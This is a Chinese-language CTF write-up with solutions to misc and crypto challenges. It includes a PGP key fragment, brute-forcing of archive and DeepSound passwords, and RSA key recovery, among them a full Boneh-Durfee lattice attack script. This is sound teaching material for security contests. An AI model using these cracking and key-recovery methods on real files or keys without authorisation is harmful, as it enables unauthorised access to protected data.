mtR9arYUNPhdMJ6dkpRpD6ZKWCbRFceOHEsQoD88493aBc8Y/WflEJTrAjKYRtLO
dL4qOMduCYX4oAs//F0ahvBVomI20Ck59cFBIE198hDzhEaaWMI9OyjVdmP6j+lZ
l1hYspqm/x4cgrbsI1gK/te2eK1nv+TqNvsrNWQD
=MkMD
-----END PGP PRIVATE KEY BLOCK-----
一个私钥一个PGP信息,但是没有PGP私钥的密码
得到密码 password
填入密码导入私钥
gpg --import key.pgp
gpg --decrypt cipher.asc
CnHongke{427316cf6004a4d83be9c6474ec6ba45}
鸡蛋别放在一起
文件名都是32位的,里面还有不少的base64,随便跳了一个,MD5爆破出来是数字,猜测是顺序,根据文件名得到顺序,然后拼起来
import base64
import zipfile
import hashlib
dic = {hashlib.md5(str(i).encode()).hexdigest(): i for i in range(5141)}
zf = zipfile.ZipFile("./1a8158054c76602e19ee7face3c3aaef.zip")
baseStr = list(5141 * " ")
for fileName in zf.namelist():
md5 = fileName.replace(".txt", "")
baseStr[dic[md5]] = zf.read(fileName)
with open("flag.out", "wb") as f:
f.write(base64.b64decode(b''.join(baseStr)))
010打开发现是zip,重命名为 flag.zip
你在寻找钥匙么?
也许你该了解一下图片中的花朵。
ps:钥匙为12位纯数字,试试爆破?
Vm0weE1HRXdOVWRpUm1oVlYwZDRXRmxVU2xOalZsWnpWMjFHV0ZKdGVGcFpNRlpyVmxVeFdHVkljRmhoTVZWNFdXdGFZV015VGtaYVJtUlRUVEJLUlZacVFtdFNNRFZ6VjI1T2FsSnNjRmhhVjNoaFVsWmtWMVZyZEZOTmF6RTBWMnRvVTFWR1duUlZiR2hXWWtkb1JGVXdXbUZTTVdSelYyczFWMkpXU2xwV1ZFb3dXVlpTYzFkc1ZtbFNiV2hYV1d4b2IyVldjRlpYYlVacVlrWndlbFpIZUhkV01rWTJWbGhrVjJFeVVUQlpla1p6VjBaYWRWTnNhR2xTTTJob1ZtMTBWMUp0VmtkVmJHUlRWa2Q0VWxaV1VYZFBVVDA5
得到一个提示,和一张图片,图片中是水仙花数zz
尾部还有一个RC4,首先肯定不是爆破,不太实际,根据图片,所以是水仙花数,百度了一下没有12位的水仙花数,但是3位数的有4个
153370371407
至于为什么单独把这个拿出来解密不了,我的猜测是,出题人先把密文放在图片后面然后加密,然后再把图片改回去,因为 RC4
后明文长度和密码长度一样,但是解密必须要带着图片一起解密了,不然不行
CnHongKe{ab8924781d4c9b5f1bd0c5adfb14c8ec}
谍影重重
- 打开docx提示有错误,我们把后缀名改为.zip,解压里面能找到一个flag.zip,大小42,基本符合是正确的flag,里面还有一个
secret.wav
,拖入deepsound
直接提示有密码,爆破看看
我用的是我的脚本,内置了一些规则而已,得到密码 20210110
脚本链接:https://github.com/Byxs20/johnCrack
- 得到
passwd.txt
,应该指的是key.zip
的密码,修好zip头打开passwd.txt
应该是16进制,但是被换了,使用PuzzleSolver看看有哪些字符
工具链接:https://github.com/Byxs20/PuzzleSolver(真的好用)
一共17个字符串,因为带了一个空格,字母是 npqros
,正确顺序应该是 nopqrs
和 abcdef
做了置换,撸了脚本
with open("./passwd.txt", "r") as f:
data = f.read()
table = str.maketrans("nopqrs", "abcdef")
bin_str = str.translate(data, table).replace("\n", "").replace(" ", "")
with open("out.out", "wb") as f:
f.write(bytes.fromhex(bin_str))
打开一看,jpg头部,后缀名改成jpg,模板匹配结果一眼看到
passwd_1:interesting_
还有一个也得到了:passwd_2:exif 、interesting_exif 解压key.zip
使用字典爆破密码:January_10th
解压zip,得flag
CnHongKe{a94a0b9467e33b41a850b774ba889e9f}
crypto
asr
from Crypto.Util.number import *
from secret import flag
def genprime():
while True:
r = getRandomNBitInteger(64)
p = r**6 + 8*r**4 - 41*r**3 + 14*r**2 - 116*r + 31387
q = r**5 - 9*r**4 + 17*r**3 - 311*r**2 - 16*r + 14029
if isPrime(p) and isPrime(q):
return p, q
def enc(flag, n):
m = bytes_to_long(flag)
return pow(m, 31387, n)
p, q = genprime()
n = p * q
c = enc(flag, n)
print(n)
print(c)
题解
因为这个指数爆炸的,所以开方下来的r是可能小于或大于正常的r(但在r的附近),
我们尝试爆破一下,满足if的三个条件就成立,然后恢复p,在常规RSA解
n=73553176031506251642448229714220151174734540964434813056145000616720019024269982417494553771890010861489245572362590935764438928110836109730139595790550323300572059713433794357690270439325805603980903813396260703
c=6035303231100318215656164353047198868742763055193754611914191674005776329646395050293747516587004104241717689072827492745628156828285466831779549229513115371571798719567117034735830671759951028004405762435531685
from gmpy2 import *
from Crypto.Util.number import *
# r=iroot(n,11)[0]
# for i in range(100000):
# p = r**6 + 8*r**4 - 41*r**3 + 14*r**2 - 116*r + 31387
# q = r**5 - 9*r**4 + 17*r**3 - 311*r**2 - 16*r + 14029
# r=r+1
# if isPrime(p) and isPrime(q) and n==p*q:
# print(p)
# break
p=36610088622356068137383969963658126276773383894090903529990995656124701988715522981081991290515245553076636123915483
q=n//p
e=31387
d=inverse(e,p-1)
m=pow(c,d,p)
print(long_to_bytes(m))
# b'CnHongKe{m0re_fuN_RSA!!!}'
easyrsa
from Crypto.Util.number import *
from gmpy2 import invert
#from secret import flag,e
e=11299
flag="CnHongKe{xxxxx}"
def enc(key, p):
e, n = key
cipher = [pow(ord(char), e, n) for char in p]
return cipher
def dec(pk, c):
key, n = pk
plain = [chr(pow(char, key, n)) for char in c]
return ''.join(plain)
p = getPrime(512)
q = getPrime(512)
n = p*q
pubkey = (e,n)
assert(e < 20000)
print("Public key:")
print(pubkey[1])
cipher = (enc(pubkey, flag))
print("Encrypted flag:")
print(cipher)
题解
这题的enc函数中,将flag的每个字节分别进行加密,这导致明文空间只有256,简单枚举即可算出m。e应该是未知的,我们对e进行遍历爆破得到开头字母C,得到e
n = 72247494519029483967034760366376786853061601103300157813759661775953565912596351092287547406601293830981872918918938736057259213906558022493243888210973589378711150746378675386713286364059548872717761789465830532496818860955952848759604076974545518597370294034234115061042965941759696027120414108241913315823
c = [23086568633766027889700149282556028601873588133389538577048220777519629053893020835596785887647597774272630671514043075789089166339490664485821551265008072526985961605709337174865785620861795518368806256695564549352791382917399957127324333828822855864895189216581775972150143373812919138450624070271563605781, 61424780590998716668669522879005833894226611068988736111090847848564952203683192799647992306556603909310758923465682857752771528865725336620979965796403804180726836508128298963907214867637490978049881021200499605597084724400813056262536028860369819412653602159130062278358850923752212354694875260742761085298, 48972347185727309580275811398968322398732292284718613286033964656750569533816676490768122129969818200823106363038086076716848785261859085349544695714346759435389253954398744742706972731080540025437559712419376172012608552755595256980994587437212314607911439680754158685958213442852345610886117149808132016667, 61900034054386621130587335874165191153789670659043111868368913383427388843553828977951515166753531254554889530123861241679942156133394477844988559568261609121966239636746106844585498882352452796587012169345091313195906669668187972481122815780919799898784783071380231308771760678158462462371463688337980966056, 61424780590998716668669522879005833894226611068988736111090847848564952203683192799647992306556603909310758923465682857752771528865725336620979965796403804180726836508128298963907214867637490978049881021200499605597084724400813056262536028860369819412653602159130062278358850923752212354694875260742761085298, 9450415868171579852265098054119152648200942770623210086786809222084784959844945630371248180007508011953947300816820109987312423346559505226253550792399518771112488858163511513111841198409634670818742944088825363946933893952656072580401498319136121912520261916028145167846733858193149171599064970439268199783, 10035734578627344969947375235594072983851319696847209997368331158831147669149961069031833471519627366504594153020437204571060611428623914456969214997923532068856482468179965518854707629794312716955250557912419773434419097161023559262564458848063915219346903480654597328232422644596377103117825829328614075690, 5651041338136387965270707005514495599960051787842260459297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 14271259146328702790695772784067429851163342737347538777950741762508946650827944617931146968866218980425939274541815935964077603794848153188731356254177631333208035026728310408767228380734867744475231330055609453484352384922899766458129175972076865172633564831188088602907146780176603278159798710852150155253, 62406194652765011605245085350409728452067228284594736543030951188813141827047471129688563874017873401654027493958313799538667190622125421268982329762449606129199279688989354341511243792985075002044026442461088633434402762089223231979549393979184803396697173744411798858018768084174805247172995100258785744206, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 565104133813638796527070700551449559996005178784226045,
9297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 3956140276099962408524811644378665260926195324627931125735919417604617330787900581903522720016806707086965650313838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 26352444581944643830963227423429946980811236174292159142870560906116668786800921081108266494217634934060542948019867625299869944900083383044563948756655507024025376518773098977036898176798319228360435941463124583821154981070698271384027340432620539761424919238056654209894138660851835259359180413998571510866, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 3956140276099962408524811644378665260926195324627931125735919417604617330787900581903522720016806707086965650313838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 38583572018907364214647900005166742548285199585572254326541125387795789224923544225334386246655335740938100752554849888600258201438026409196139322439518308323982209353504064739859448757230608480631399883893401220790226127149746215151900805996489931009866529965548635227695192170717058032494324346363053930619, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 39561402760999624085248116443786652609261953246279311257359194176046173307879005819035227200168067070869656503,
13838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 5651041338136387965270707005514495599960051787842260459297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 21643731734484252696109953515687478013118937715056061520976924340371395968660338303624558633862679263768843575243426341986847599097591917653435606042602095144570247241757302533523905744626606836773661026140082883368820615972739914083417816255913686820936373857254933361629603081613492930030281179652207492149, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 395614027609996240852481164437866526092619532462793112573591941760461733078790058190352272001680670708696565031383813584099258044287660547481138381810824496633727067,
1303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 20593313344992264722474643208232460904729585942331327945281307002575544045487870568637031063784433406096326172788745559326479291854636106027597680333110098010128235038952685620360851399518780967171732233524825381055879695801401425059095441692301391956163400460584139637380367489591078077440142620116997434358]
for i in range(20000):
if pow(ord('C') , i , n) == c[0]:
e = i
print(e)
break
e=11299
m=''
for c1 in c:
for i in range(127) :
if pow(i,11299,n)==c1:
m+=chr(i)
print(m)
# CnHongKe{a8cc755d375811f55cec82153388c}
bd
from Crypto.Util.number import *
from secret import flag
p = getPrime(512)
q = getPrime(512)
n = p * q
d = getPrime(299)
e = inverse(d,(p-1)*(q-1))
m = bytes_to_long(flag)
c = pow(m,e,n)
hint1 = p >> (512-70)
hint2 = q >> (512-70)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
print(f"hint1 = {hint1}")
print(f"hint2 = {hint2}")
题解
论文题,论文链接:https://github.com/mimoo/RSA-and-LLL-attacks
sage
from __future__ import print_function
import time
############################################
# Config
##########################################
"""
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
"""
debug = True
"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
"""
strict = False
"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
"""
helpful_only = True
dimension_min = 7 # stop removing if lattice reaches that dimension
############################################
# Functions
##########################################
# display stats on helpful vectors
def helpful_vectors(BB, modulus):
nothelpful = 0
for ii in range(BB.dimensions()[0]):
if BB[ii, ii] >= modulus:
nothelpful += 1
print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")
# display matrix picture with 0 and X
def matrix_overview(BB, bound):
for ii in range(BB.dimensions()[0]):
a = ('%02d ' % ii)
for jj in range(BB.dimensions()[1]):
a += '0' if BB[ii, jj] == 0 else 'X'
if BB.dimensions()[0] < 60:
a += ' '
if BB[ii, ii] >= bound:
a += '~'
print(a)
# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):
# end of our recursive function
if current == -1 or BB.dimensions()[0] <= dimension_min:
return BB
# we start by checking from the end
for ii in range(current, -1, -1):
# if it is unhelpful:
if BB[ii, ii] >= bound:
affected_vectors = 0
affected_vector_index = 0
# let's check if it affects other vectors
for jj in range(ii + 1, BB.dimensions()[0]):
# if another vector is affected:
# we increase the count
if BB[jj, ii] != 0:
affected_vectors += 1
affected_vector_index = jj
# level:0
# if no other vectors end up affected
# we remove it
if affected_vectors == 0:
print("* removing unhelpful vector", ii)
BB = BB.delete_columns([ii])
BB = BB.delete_rows([ii])
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# level:1
# if just one was affected we check
# if it is affecting someone else
elif affected_vectors == 1:
affected_deeper = True
for kk in range(affected_vector_index + 1, BB.dimensions()[0]):
# if it is affecting even one vector
# we give up on this one
if BB[kk, affected_vector_index] != 0:
affected_deeper = False
# remove both it if no other vector was affected and
# this helpful vector is not helpful enough
# compared to our unhelpful one
if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(bound - BB[ii, ii]):
print("* removing unhelpful vectors", ii, "and", affected_vector_index)
BB = BB.delete_columns([affected_vector_index, ii])
BB = BB.delete_rows([affected_vector_index, ii])
monomials.pop(affected_vector_index)
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# nothing happened
return BB
"""
Returns:
* 0,0 if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""
def boneh_durfee(pol, modulus, mm, tt, XX, YY):
"""
Boneh and Durfee revisited by Herrmann and May
finds a solution if:
* d < N^delta
* |x| < e^delta
* |y| < e^0.5
whenever delta < 1 - sqrt(2)/2 ~ 0.292
"""
# substitution (Herrman and May)
PR.< u, x, y>= PolynomialRing(ZZ)
Q = PR.quotient(x * y + 1 - u) # u = xy + 1
polZ = Q(pol).lift()
UU = XX * YY + 1
# x-shifts
gg = []
for kk in range(mm + 1):
for ii in range(mm - kk + 1):
xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kk
gg.append(xshift)
gg.sort()
# x-shifts list of monomials
monomials = []
for polynomial in gg:
for monomial in polynomial.monomials():
if monomial not in monomials:
monomials.append(monomial)
monomials.sort()
# y-shifts (selected by Herrman and May)
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)
yshift = Q(yshift).lift()
gg.append(yshift) # substitution
# y-shifts list of monomials
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
monomials.append(u ^ kk * y ^ jj)
# construct lattice B
nn = len(monomials)
BB = Matrix(ZZ, nn)
for ii in range(nn):
BB[ii, 0] = gg[ii](0, 0, 0)
for jj in range(1, ii + 1):
if monomials[jj] in gg[ii].monomials():
BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)
# Prototype to reduce the lattice
if helpful_only:
# automatically remove
BB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)
# reset dimension
nn = BB.dimensions()[0]
if nn == 0:
print("failure")
return 0, 0
# check if vectors are helpful
if debug:
helpful_vectors(BB, modulus ^ mm)
# check if determinant is correctly bounded
det = BB.det()
bound = modulus ^ (mm * nn)
if det >= bound:
print("We do not have det < bound. Solutions might not be found.")
print("Try with highers m and t.")
if debug:
diff = (log(det) - log(bound)) / log(2)
print("size det(L) - size e^(m*n) = ", floor(diff))
if strict:
return -1, -1
else:
print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")
# display the lattice basis
if debug:
matrix_overview(BB, modulus ^ mm)
# LLL
if debug:
print("optimizing basis of the lattice via LLL, this can take a long time")
BB = BB.LLL()
if debug:
print("LLL is done!")
# transform vector i & j -> polynomials 1 & 2
if debug:
print("looking for independent vectors in the lattice")
found_polynomials = False
for pol1_idx in range(nn - 1):
for pol2_idx in range(pol1_idx + 1, nn):
# for i and j, create the two polynomials
PR.<w, z>= PolynomialRing(ZZ)
pol1 = pol2 = 0
for jj in range(nn):
pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)
# resultant
PR.<q>= PolynomialRing(ZZ)
rr = pol1.resultant(pol2)
# are these good polynomials?
if rr.is_zero() or rr.monomials() == [1]:
continue
else:
print("found them, using vectors", pol1_idx, "and", pol2_idx)
found_polynomials = True
break
if found_polynomials:
break
if not found_polynomials:
print("no independant vectors could be found. This should very rarely happen...")
return 0, 0
rr = rr(q, q)
# solutions
soly = rr.roots()
if len(soly) == 0:
print("Your prediction (delta) is too small")
return 0, 0
soly = soly[0][0]
ss = pol1(q, soly)
solx = ss.roots()[0][0]
#
return solx, soly
def example():
############################################
# How To Use This Script
##########################################
#
# The problem to solve (edit the following values)
#
# the modulus
N = 73337798113265277242402875272164983073482378701520700321577706460042584510776095519204866950129951930143711572581533177043149866218358557626070702546982947219557280493881836314492046745063916644418320245218549690820002504737756133747743286301499039227014032044403571945455215839074583290324966069724343874361
e = 42681919079074901709680276679968298324860328305878264036188155781983964226653746568102282190906458519960811259171162918944726137301701132135900454469634110653076655027353831375989861927565774719655974876907429954299669710134188543166679161864800926130527741511760447090995444554722545165685959110788876766283
c = 35616516401097721876690503261383371143934066789806504179229622323608172352486702183654617788750099596415052166506074598646146147151595929618406796332682042252530491640781065608144381326123387506000855818316664510273026302748073274714692374375426255513608075674924804166600192903250052744024508330641045908599
L=94273059221083385396
sh = L << (512 - 67)
# the hypothesis on the private exponent (the theoretical maximum is 0.292)
delta = .292 # this means that d < N^delta
#
# Lattice (tweak those values)
#
# you should tweak this (after a first run), (e.g. increment it until a solution is found)
m = 6 # size of the lattice (bigger the better/slower)
# you need to be a lattice master to tweak these
t = int((1 - 2 * delta) * m) # optimization from Herrmann and May
X = floor(N ^ delta) # this _might_ be too much
Y = floor(2 ^445) # correct if p, q are ~ same size
#
# Don't touch anything below
#
# Problem put in equation
P.< x, y >= PolynomialRing(ZZ)
A = int((N + 1) / 2 - sh)
pol = 1 + x * (A + y)
'''
e d = 1 + k (p-1) (q-1)
e d = 1 + k (N+1) + k s
e d = 1 + 2k ((N+1)/2 + s/2)
e d = 1 + 2k ((N+1)/2 + sh/2 + sl/2)
'''
#
# Find the solutions!
#
# Checking bounds
if debug:
print("=== checking values ===")
print("* delta:", delta)
print("* delta < 0.292", delta < 0.292)
print("* size of e:", int(log(e) / log(2)))
print("* size of N:", int(log(N) / log(2)))
print("* m:", m, ", t:", t)
# boneh_durfee
if debug:
print("=== running algorithm ===")
start_time = time.time()
solx, soly = boneh_durfee(pol, e, m, t, X, Y)
# found a solution?
if solx > 0:
print("=== solution found ===")
if False:
print("x:", solx)
print("y:", soly)
d = int(pol(solx, soly) / e)
print("private key found:", d)
else:
print("=== no solution was found ===")
if debug:
print(("=== %s seconds ===" % (time.time() - start_time)))
if __name__ == "__main__":
example()
n = 73337798113265277242402875272164983073482378701520700321577706460042584510776095519204866950129951930143711572581533177043149866218358557626070702546982947219557280493881836314492046745063916644418320245218549690820002504737756133747743286301499039227014032044403571945455215839074583290324966069724343874361
c = 35616516401097721876690503261383371143934066789806504179229622323608172352486702183654617788750099596415052166506074598646146147151595929618406796332682042252530491640781065608144381326123387506000855818316664510273026302748073274714692374375426255513608075674924804166600192903250052744024508330641045908599
d=783087701705468761679148299766995936398557044101882919430819055852416479930185217204358163
from Crypto.Util.number import *
m=pow(c,d,n)
print(long_to_bytes(m))
根据论文恢复d,后面正常解rsa得到m
prng
from Crypto.Util.number import *
from secret import flag
import random
def base(n, l):
bb = []
while n > 0:
n, r = divmod(n, l)
bb.append(r)
return ''.join(str(d) for d in bb[::-1])
def prng(secret):
seed = base(secret, 5)
seed = [int(i) for i in list(seed)]
length = len(seed)
R = [[ random.randint(0,4) for _ in range(length)] for _ in range(length*2)]
S = []
for r in R:
s = 0
for index in range(length):
s += (r[index] * seed[index]) % 5
s %= 5
S.append(s)
return R, S
m = bytes_to_long(flag)
R, S = prng(m)
with open('output.txt', 'w') as f:
f.write(f'R = {R}\nS = {S}')
题解
根据线性代数解一下,直接解 linear system 搞定
实际上就是R.seed=S,给定R和S求seed。计算过程在模5下进行。但是R为l^2行,l列,如果直接解矩阵方程复杂度太大不可行,考虑只取前3l行进行计算,矩阵满秩且复杂度可接受
from Crypto.Util.number import *
R=[]
R_=R
r=matrix(GF(5),R_)
s=matrix(GF(5),S).transpose()
seed=r\s
m=seed.list()
flag="".join(map(str,m))
FLAG=int(flag,5)
print(long_to_bytes(FLAG))
# CnHongKe{l1ne4r_prng_1s_d4ngr0s~~!d9uxdj9223}